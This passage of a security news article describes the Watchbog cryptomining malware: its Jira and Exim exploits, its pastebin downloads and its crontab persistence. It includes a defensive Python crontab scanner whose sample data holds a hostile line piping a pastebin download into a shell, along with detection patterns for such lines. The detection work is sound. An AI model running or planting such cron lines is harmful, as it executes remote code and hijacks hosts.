Watchbog is a malware strain used to attack Linux hosts running vulnerable software such as Jenkins, Nexus Repository Manager 3, ThinkPHP and Supervisord; it was first described by Alibaba Cloud Security researchers during a campaign in May.

Targeting Exim and Jira vulnerabilities

The latest strain, found by Intezer Labs researchers on VirusTotal, uses malicious payloads to exploit CVE-2019-11581, the 12-day-old Jira template injection vulnerability that leads to Remote Code Execution. The new version of this variant was discovered by polarply. It will also exploit CVE-2019-10149, a remote flaw in Exim that lets attackers run commands as root after exploitation and that is known to have been exploited in the wild at least since 9 June. According to a current Shodan search, more than 1,610,000 unique Exim servers and, as per BinaryEdge, over 54,000 vulnerable Atlassian JIRA hosts could be affected by this attack. This variant is currently not detected by any VirusTotal scan engine: the Watchbog sample polarply found has an AV detection ratio of 0/55. More information is available on Intezer Analyze.
"Patch Patch Patch! Added to Intezer Analyze – https://t.co/hWZBCHNjxM pic.twitter.com/6s7bXCfV9d" — polarply (@polarply), July 22, 2019

Infecting Linux servers

The infection process in Watchbog is quite simple: after exploiting the vulnerabilities it targets, it drops a Monero coinminer and guards it against the user's attempts to remove it. Once it gains a foothold on a vulnerable host, Watchbog downloads and executes malicious commands hosted on pastebin, which eventually deploy and run the final cryptocurrency miner payload on the compromised Linux box. The malware also persists by adding itself to several crontab files, so that it can come back and reinfect the system if the user does not remove every crontab that was changed.
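As an added defender-side example (not from the article or from any of the researchers it cites), the following Python audit reads the crontab locations that this kind of cron-based persistence touches and flags entries that pull commands from a paste site or pipe a download straight into a shell; the sample crontab contents and the pastebin URLs in them are constructed for the demonstration, not taken from a Watchbog sample.

```python
import glob
import re

# Constructed sample crontab contents: one benign system entry, one
# entry in the style of cron persistence that re-fetches a paste, one
# benign backup job.  None of this is from a real Watchbog sample.
SAMPLE_CRONTABS = {
    "/etc/crontab": "SHELL=/bin/sh\n"
                    "17 * * * * root cd / && run-parts --report /etc/cron.hourly\n",
    "/var/spool/cron/crontabs/root":
        "# m h dom mon dow command\n"
        "*/10 * * * * (curl -fsSL https://pastebin.com/raw/EXAMPLE1"
        "||wget -q -O- https://pastebin.com/raw/EXAMPLE1)|sh\n",
    "/etc/cron.d/backup": "0 2 * * * backup /usr/local/bin/backup.sh\n",
}

# Each pattern is paired with the reason an analyst should look at the entry.
SUSPICIOUS_PATTERNS = [
    (r"pastebin\.com/raw", "fetches code from a paste site"),
    (r"\b(curl|wget)\b[^|]*\|\s*(ba)?sh\b", "pipes a download straight into a shell"),
    (r"\|\s*base64\s+(-d|--decode)", "decodes an embedded base64 payload"),
]

# Locations where system and per-user crontabs live on common Linux distributions.
CRONTAB_GLOBS = ["/etc/crontab", "/etc/cron.d/*",
                 "/var/spool/cron/*", "/var/spool/cron/crontabs/*"]


def scan_crontab(path, text):
    """Return one finding per (entry, pattern) hit; comments and blanks are skipped."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        entry = line.strip()
        if not entry or entry.startswith("#"):
            continue
        for pattern, reason in SUSPICIOUS_PATTERNS:
            if re.search(pattern, entry):
                findings.append({"file": path, "line": lineno,
                                 "reason": reason, "entry": entry})
    return findings


def scan_all(crontabs):
    """crontabs maps a path to its text; returns all findings in path order."""
    findings = []
    for path, text in crontabs.items():
        findings.extend(scan_crontab(path, text))
    return findings


def load_host_crontabs():
    """Read the real crontab files on this host (requires root to see all of them)."""
    paths = [p for pattern in CRONTAB_GLOBS for p in glob.glob(pattern)]
    return {p: open(p, errors="replace").read() for p in paths if not glob.os.path.isdir(p)}


if __name__ == "__main__":
    for f in scan_all(SAMPLE_CRONTABS):   # swap in load_host_crontabs() for a live audit
        print(f"{f['file']}:{f['line']}: {f['reason']}\n    {f['entry']}")
```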
Watchbog attack process (image: Alibaba Cloud Security)

According to the coin-mining setup file, this variant uses the mining pool minexmr.com, as did the previous version of Watchbog, and it collects all the proceeds at the 47k2wdnyBoMT6N9ho5Y7u Qg1J6gPsTboKP6JxfB5msf3jUUvTfEceK5U7KLnWir5VZPKgUVxpkXnJLmijau3VZ8D2zsyL7 address also used during the campaign targeting Jenkins servers in May.
Payment address

Apart from the lack of VirusTotal detections and the switch to targeting Jira and Exim hosts, there is one more thing that makes this particular Watchbog variant special: the malicious script it uses to drop the payload on compromised Linux servers also includes a contact note for its victims. While in previous versions of the malware the attackers would only offer the victims the service of removing the infection, hopefully by sending them a "cleanup script", "the source of the entry and fix", this variant notes that "the mission of the attackers is to safeguard the internet." The following note is available in the malicious script: